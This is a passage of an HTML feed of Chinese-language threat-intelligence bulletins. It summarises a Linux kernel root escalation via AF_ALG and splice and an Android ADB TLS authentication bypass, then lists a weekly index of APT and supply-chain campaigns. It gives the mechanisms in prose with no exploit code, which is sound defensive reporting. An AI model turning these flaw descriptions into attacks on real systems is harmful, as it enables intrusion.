perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034970" src="https://wechat2rss.xlab.app/img-proxy/?k=e27817ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqibzAEbklmjEBZeJwvWxmGn6EhcS1U7Qo5rZsc4NhzyoOO6zZHzTdIgUlJ2lNOhZX34ticAKcW67ufUQXB3ialoyzIaHOaNlhRCJc%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034973" src="https://wechat2rss.xlab.app/img-proxy/?k=812fd118&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq88bLSq46PibB1Vhqn7hNp0zb2iaxTkcUe8HoZcLWT790kibvaBGK2JotJyXodoPpsUD0J5IubPCApz2y5vJvx4rKd8b4oku9SXCw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034972" src="https://wechat2rss.xlab.app/img-proxy/?k=a6bbff56&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq8oe1EVohKyo7Hibtib57uKib66Z3D9HiasXawo1Uz0ibH9nCLCQdb27RJb7X1tSpmxx3muFicbBL5js8kUNSj3iblv0AibVO3JNvKgzY8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">CVE-2026-31431：复制失败漏洞允许跨云环境提升 Linux root 权限</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月1日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.microsoft.com/en-us/security/blog/2026/05/01/cve-2026-31431-copy-fail-vulnerability-enables-linux-root-privilege-escalation/" target="_blank">https://www.microsoft.com/en-us/security/blog/2026/05/01/cve-2026-31431-copy-fail-vulnerability-enables-linux-root-privilege-escalation/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Linux内核加密子系统存在本地权限提升漏洞CVE-2026-31431，非特权用户可通过AF_ALG和splice系统调用实现内核页缓存的4字节覆写，破坏任意可读文件的内存缓存，从而将权限提升至root。该漏洞影响2017年以来的几乎所有Linux发行版及云环境，已出现可利用的PoC，厂商已发布补丁或建议禁用AF_ALG模块。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034975" data-ratio="0.5546697038724373" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="878" src="https://wechat2rss.xlab.app/img-proxy/?k=53ee78c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOqibNcr5vzab0QZvp45lqOribIMxUc9ict6AtW6eUStlc8Cw4ENvPOZd8te2hC21LMlHAuibaeISe07JN69pIVibvFOwHLTcQwFic0EZk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Android ADB over TCP 认证路径中存在严重无交互远程代码执行漏洞</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月5日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/" target="_blank">https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-0073是Android调试桥adbd在TLS客户端认证路径中的严重漏洞，攻击者可在无需交互的情况下，通过发送非RSA类型的证书，利用EVP_PKEY_cmp返回值处理错误绕过认证，从而获得shell用户权限的远程代码执行能力。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="gif" data-w="480" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034976" src="https://wechat2rss.xlab.app/img-proxy/?k=526e9855&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqiczqjyJKJicV5tyPzLeVNmsYdBK2qmIgcuMQBnyWxXbOUaF7a3aicthTZSoda0GK67l9w8qcH7jqSrKs3iaa3mNhoNfP14Hp1s3Dw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.3</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a78a2617&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518627%26idx%3D1%26sn%3Db29e952bd2d03588db5aab224debf1a7">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 08 May 2026 10:30:00 +0800</pubDate>
    </item>
    <item>
      <title>每周高级威胁情报解读(2026.04.24~04.30)</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518591&amp;idx=1&amp;sn=1f6824aab3a7d1d8efd041f9749d226e</link>
      <description>BlueNoroff 利用 ClickFix、无文件 PowerShell 和 AI 生成的虚假 Zoom 会议攻击 Web3 行业；与Lazarus有关联的 npm 恶意软件攻击活动涉及 108 个恶意软件包；Kimsuky组织针对处方药公司进行攻击</description>
      <content:encoded><![CDATA[<p><span>威胁情报中心</span> <span>2026-05-01 10:31</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=51df14de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq8JhrnQTiaPnRmHJShr97oDxXZ63icrGicwQwteuziaPmKdvSY6rZKZT7ous4wS51GF2B15fAY6TrypibsibNOg2hkic7H5RuMs0ovQuk%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>BlueNoroff 利用 ClickFix、无文件 PowerShell 和 AI 生成的虚假 Zoom 会议攻击 Web3 行业；与Lazarus有关联的 npm 恶意软件攻击活动涉及 108 个恶意软件包；Kimsuky组织针对处方药公司进行攻击</p>
  <div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;box-sizing: border-box;"><p style="display: inline-block;box-sizing: border-box;"><span style="display: block;padding: 0.3em 0.5em;border-radius: 0.8em 0.8em 0px 0px;background-color: rgb(55, 113, 187);color: rgb(255, 255, 255);box-sizing: border-box;" title=""><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026.04.24~04.30</span></p></span></p><div style="border: 1px solid rgb(55, 113, 187);border-radius: 0px 0px 0.8em 0.8em;padding: 10px;box-sizing: border-box;"><div style="line-height: 1.75;text-align: justify;font-size: 14px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击团伙情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">BlueNoroff 利用 ClickFix、无文件 PowerShell 和 AI 生成的虚假 Zoom 会议攻击 Web3 行业</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">与Lazarus有关联的 npm 恶意软件攻击活动涉及 108 个恶意软件包</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Kimsuky组织针对处方药公司进行攻击</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ShadowBrokers泄露中的神秘引用揭示Stuxnet五年前的高精度软件破坏框架&#34;fast16&#34;</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">蔓灵花组织使用NUITKA打包的python样本进行投递</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Lazarus 利用人工智能将对开发者的攻击产业化</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击行动或事件情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者会冒充 IT 或技术支持人员实施数据窃取</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者利用macOS原生功能实现“离地”攻击</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">伪装成TikTok视频下载器的扩展程序窃取13万用户数据</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">又又一起AI相关供应链事件：Xinference PyPI (版本 2.6.0–2.6.2)供应链污染报告</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">PhantomCLR 行动：通过应用程序域劫持和内存中 .NET 滥用进行隐蔽执行</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意代码情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GlassWorm 恶意软件通过 73 个 OpenVSX &#34;沉睡者&#34;扩展卷土重来</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">PhantomRPC：Windows RPC 中的一种新的权限提升技术</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">UNC6692 利用社会工程学部署定制恶意软件套件</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">UAT-4356 针对 Cisco Firepower 设备的目标</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">供应链攻击永无眠：SAP CAP &amp; Cloud MTA npm 供应链攻击事件报告</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GNU nano 软件中存在CVE-2026-40556漏洞</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">APT28 零日漏洞补丁不完整导致 CVE-2026-32202 的出现</span></p></li></ul></div></div></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034923" src="https://wechat2rss.xlab.app/img-proxy/?k=c24a035b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8IUp5Jd7FshLYVIHAq5NTrcykQLqKOHBLReMibEsp88h06S5pexof0TM2O0ZNea2ZAkCNJNAmibSH0SHCy7rync8icOFibYnLzbd0%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034920" src="https://wechat2rss.xlab.app/img-proxy/?k=ba8ca687&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq9bgojbXWdOpHctOibdriadYl6pUBtkZJvWqS37DlaUM1hmEXlqQV6vNl9D34Ficich5qTQC1icZyJmrIadGKlgwQfBEpnibykeLY2xg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击团伙情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034922" src="https://wechat2rss.xlab.app/img-proxy/?k=4f359902&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq8u9icz5dIFjeajBMDRnBbLa9Bzeiaq6JJ3sxYKF3s3Zxb4n5Z0wHsiahZ3D0DqpbSgkJhTE5a0TJfamoBib2CMHYs8zyPUUDXxiakA%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034921" src="https://wechat2rss.xlab.app/img-proxy/?k=f459de78&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq9RzX7S9McrA39pg5gw0OnUExOzLr6F90JBiae8aicxl02kGXjcacjkAT2uotz7U1jDBXbNJZZjmHP2TIjRicGaRYaAb68Y2oBBgU%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">BlueNoroff 利用 ClickFix、无文件 PowerShell 和 AI 生成的虚假 Zoom 会议攻击 Web3 行业</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月27日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://arcticwolf.com/resources/blog/bluenoroff-uses-clickfix-fileless-powershell-and-ai-generated-zoom-meetings-to-target-web3-sector/" 